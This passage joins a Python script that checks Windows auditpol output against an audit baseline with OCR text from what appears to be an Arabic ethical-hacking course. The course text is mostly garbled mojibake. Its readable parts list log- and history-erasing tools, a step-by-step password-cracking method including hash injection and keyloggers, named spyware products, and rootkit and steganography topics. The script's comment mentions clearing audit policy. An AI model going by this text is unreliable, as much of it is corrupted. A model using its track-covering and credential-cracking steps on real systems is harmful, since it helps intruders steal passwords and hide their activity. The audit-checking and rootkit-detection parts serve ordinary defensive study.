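# `auditpol /clear`). The output layout and the baseline are assumptions.
import re

# Constructed sample in the shape auditpol prints; not captured from a real host.
SAMPLE_OUTPUT = """\
Category/Subcategory                      Setting
System
  Security System Extension               No Auditing
  Security State Change                   Success
Logon/Logoff
  Logon                                   Success and Failure
  Logoff                                  No Auditing
Account Logon
  Kerberos Authentication Service         No Auditing
  Credential Validation                   No Auditing
"""

# Assumed baseline: the minimum setting each subcategory should keep.
BASELINE = {
    "Logon": "Success and Failure",
    "Logoff": "Success",
    "Credential Validation": "Success and Failure",
    "Security State Change": "Success",
}

SETTINGS = ("No Auditing", "Success and Failure", "Success", "Failure")
# Subcategory lines are indented two spaces; the setting is the last field.
LINE_RE = re.compile(r"^  (?P<sub>\S.*?)\s{2,}(?P<setting>%s)\s*$" % "|".join(SETTINGS))

def parse_auditpol(text):
    """Return {subcategory: setting} from auditpol /get /category:* output."""
    policy = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            policy[m.group("sub")] = m.group("setting")
    return policy

def _covers(setting):
    # Events a setting records, as a set, so two settings can be compared.
    return {"Success and Failure": {"Success", "Failure"},
            "Success": {"Success"}, "Failure": {"Failure"}}.get(setting, set())

def audit_gaps(policy, baseline=BASELINE):
    """Subcategories recording less than the baseline; missing ones count too."""
    return {sub: policy.get(sub, "Not present") for sub, req in baseline.items()
            if _covers(req) - _covers(policy.get(sub))}
```

Run against a real dump by feeding the captured text to `parse_auditpol` and comparing against the baseline your own policy defines; a subcategory that turns up in `audit_gaps` is one whose events are no longer reaching the Security log.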



Covering Tracks Tool: CCleaner 

Source: http://www.piriform.com

^Aj^aJ Jjj^alij jtjl c a]aJJj <La>lklLaix J^*Ji dlliLJl a}\ jLj till ^-gjoiJ .L_LllaJJ Sbl j 6<Jj^a j> <^\\\ i ^Uaill (jjjud^jl £>bl j& CCleaner 

£x» I^I^JjojV dljl!i3l (J^a^)l3l 4_^.Lal^ 
Covering Tracks Tool: MRU-Blaster



Source: http://www.brightfort.com
a jj£ j£ll j tAja^^ll CijjljVl djlaLa j t^Uaill C5 ic ^Ld^klaixJI ^jI jsW c fl-jSaiL t^ll ^jujj ^nlaj MRU-Blaster 

4_U£ CjU jk* till ja jjMRU 

g-al jJI ^ l^SjS CjULlJI U jjc. j "^uv^m^l cjI jLoiJI" t qjhvi jUU ^Ibu MRU-Blaster . ^-aUJI ^j^Vl 



MRU-Blaster is an application for Windows that allows you to clean the most recently used lists stored on your computer. It allows you to clean out your temporary Internet files and cookies.







https://www.facebook.com/tibea2004 



485 



Track Covering Tools 

^ixl^ ^ tiL <j^aLk]| Ajj^a^JI CjL» jIslaII ^^-^ (Track covering tools) ^— il jLai>JI 4jla*j CjI j^I 

C5 ic djl j^Vl ^ L<ua j s- 5 j-<^ j^*-^ ci^W^ j tdj!^jaj t flAai t4j3j-<JI djliLJI tiljUjj ^jII Internet history 

Wipe available at http://privacyroot.com
Tracks Eraser Pro available at http://www.acesoft.net
BleachBit available at http://bleachbit.sourceforge.net
Absoluteshield Internet Eraser Pro available at http://www.internet-track-eraser.com
Clear My History available at http://www.hide-my-ip.com
EvidenceEraser available at http://evidence-eraser-pro.en.softonic.com
WinTools.net Professional available at http://www.wintools.net
RealTime Cookie & Cache Cleaner (RtC3) available at http://www.kleinsoft.co.za
AdvaHist Eraser available at http://advahist-eraser.software.informer.com
Free Internet Window Washer available at http://www.eusing.com



5.8 PENETRATION TESTING



Password Cracking 



Step 1: Identify password protected systems

Step 2: Perform a dictionary attack

jjuo^II ^iilaj cJ^xjoij .(JJa ^Vim^l CjULuo^. AjJa 4 La nil ^jj (_^i3l j jJjuo^II J^nlaJ ^jjj j^lall c aL> Jj^^l (J^^A 3 ^* 
Ij^li ^j^J ^aJ lij . JjuJI 4_aK ^^ic ^jJ^J ^jjj ^dlill c aLa ^jl ^gisu t^Uaill J Jj> > >nl cill ^xujj ^lllajH ^jl^ lij .^cjllill j 

Step 3: Perform wire sniffing

Step 4: Perform a rule-based attack

Step 5: Perform a syllable attack

(brute force attack) SjSl! ^j^a jd ^j^^ ^ .syllable ^j^a ^1 j^j (Jjjia 0^ jj^Ji <^ <!jU^» 

. (dictionary attack)o*j^ 
Step 6: Perform a hybrid attack
Step 7: Perform a brute force attack

# JjuJI Jc JjSi*-ll aJJ J^ a *^ ^ ^-^j^ cJ^ Jj^-^ tjl L ♦ 

Step 8: Perform a man-in-the-middle attack

_CjUi jlx-<Jl ^I^^JjojV ^a^L^Jlj - *all ^JJJ JIj^jI dj| jjfl Jl (J jj^ jll Jc <J jj^^J] 4_ljL^x» 

Step 9: Perform password guessing

Step 10: Perform Trojans Spyware/Keyloggers
Step 11: Perform Hash Injection Attack

# a£jjuo3I JjI j-g ^ a > ^ ^i^jll (jjjl^Jl ^sl ^Viml j A-il^xJl <juol^Jl (jj^ <^l (JJJ^Jl 

Step 12: Perform a rainbow attack

# jjuJI ^jjjIa Ujjoixi <jjjud^xJI t - \\ &\ g \\ Q^j^j ^illrainbow <Jj-^> ?\ i^Lm! 

Step 13: Perform a distributed network attack

Step 14: Perform pre-computed hashes

Step 15: Perform dumpster diving

Step 16: Perform social engineering

Step 17: Perform shoulder surfing
.shoulder surfing ^l^i^U jjj^^ ^ 



Privilege Escalation 





j\ dliJJJ Cilia j JjjjouJI ^ jlum AjI jLiLdl lla - ^ cJj^-^ ^ t^Uaill ( >1 al£ Jc ^1 g oil J 

tililc t . LaJ t^jljlkl j;'^ o tiljj ,^Uai3l ^j-d A i J i II CjU» jIslxJI ^L^jIujI <jl£^U jUlbj 4L_fl^Jl ^Uaill Jc <liiaJi l—Aja ^j;^ 

^jl£ lit La ^i^jll ,^Uai3l <J jll <J^J ^j-d l^ilc jj^^JI ^li Jjj-<JI ^I^jjojU <J j^^ll cJjt> > >n <J jL^. 6 jjuJI 

(unprivileged account) cj^jj^) cjLUaj cjU±aJl JjLiu JjU :2 SjkaJl 

'Offline NT Password Registry Editor 'Active@ Password Changer j^VI ^ > ^ CjIj^I ^l^ki^l 
'Elcomsoft System Recovery 'Windows Password Recovery Tool 'Windows Password Reset Kit 
CjI jbiJ J^ ^^i^i lJj^ cjI jjVi ^ 'Windows Password Recovery Bootdisk 'Trinity Rescue Kit 
Executing Application

lj laa] Ub^jq'n ClalLnJajH (J-^ju jLlkl Ale. tiL (j^aLkll ^Uaill (j-a -ja-vlU Cj| jj^^H 
ui^Jl ^UaUl ^k- CjIuu jjjill jtfllLa <\nn jiaall :1 S jkkJl 

.V ^al ^ jJl ^JJ^ 4^.1^a Igil (j-a -ja^lU ;<jj!La lijj L_fl^Jl ^Uaill dlLaij J^l a ^ SI ^ * CllIJJJ ^aJ lij La -ja-vMl 

ci^JI ^QaUl Key logging Sjlua^i) jl*| jjJIj 4jU^> jli^ ^n/n j^Ml :2 SjIa^Jl 

.V ^i Keylogging <Jt ^1 jjj ajUl^JI ^Ljj c_ ujjj lij La j^v^l 

.4_Laj-a 4jjj ^ (j^Li lil La aA^xa 

'Spytech SpyAgent j^>^ ClAjLulaJ ^I^JjujI .^jjILJI dAjjjJa ■ uJ <J^j ^a ^Uaill ^^Ic jl£ ^l,1^2jailj CIiijjj 4_IjL^a 

'Advanced Keylogger 'Powered Keylogger 'AH In One Keylogger 

spy ware ^l^ouil :5 Sj^l 

SoftActivity TS ^>^i^j1I ^I^JLuit .^Uaill ^^Sc ^ U.* <J^j ^a ^Uajll ^^ic s j-" h^jII i^LujIj cIujjj <Jj^ 

.£11 'SPYPhone GOLD 'Mobile Spy 'WebCam Recorder 'Spy Voice Recorder 'Monitor 

Hiding Files 



a\\ djULall t ajj&l] JjljikVI jfo * d ll jixk ^LjI ciiilc ( . v^j ^Uaill (^AaJl J jj^a jll C5 lc- Jila^i] TOOtkitS L - 1 f^ J (*J^ f>>^ A ^ 

rootkit ^2 :1 SjIaaJI 

Step 2: Perform integrity-based detection techniques

'cross-view-based detection ' signature-based detection 'integrity-based detection cjlij^l iiiiL ^ 

.rootkit c> ( heuristic detection techniques 
rootkits ^l^l-ul :3 SjkaJ) 

Op. lJl&I t*lli Uj ^Rootkit Buster 'Virus Removal Tool 'UnHackMe 'Stinger anti-rootkits 

.rootkits 

NTFS Alternate Data Streams (ADSs) f\*&l*\ :4 Sj^l - 
c> UiL^£! ^ jl alas j ^jiLJI ^Lkj ^ iSjjaJI Cj! jii^JI ^jLJ NTFS Alternate Data Streams (ADSs) ^l^i^l 

NTFS stream detectors?t-^«t :5 Sjkkil - 
.NTFS-ADS streams CP- <J^S1 t*Bi U j streams 'ADS spy 'StreamArmor NTFS stream detectors ^l^l^l 

# CjLLiJI "LjJ^J iali^J] <^ jll I^Ij^JjujIj Ajjlx. <!Lujj <JJjuo3I JjLojjII ^ILkV CjLa jlx-aJl CjLuflJ a I laJLujI 

CjLa jlx-aJl ^jc c ^l^klujl ;7 6 J^aaJl 

'Stego Suite 'Xstegsecret 'Gargoyle Investigator" Forensic Pro cjUjIx^I ^ c^ill CjIj^I ^l^ki^l 

.Steganalysis *bV ^ u j 'Stegdetect 
Covering Tracks



.history j 'temporary files 'cache ' j^t 'MRU ^ j^Vt 4^ ^ JaL&ll cj! jL^ 3JI jj ;V jl 

(audit) J^aSM :2 Sj^t - 
. AuditpolJ^ f\ ikUj tillij ^Uill <lj .l^i^ioij ^1 ^Uailt <jAtfil J^xj] ^ 

.log flooding jl log poisoning proxy log files 'server log files 'event log files J^Jl cjUL ^ a! jU^» 

'Clear My History 'Tracks Eraser Pro 'Wipe 'MRU-Blaster ' CCleanercS^ ^1 j^l ^ 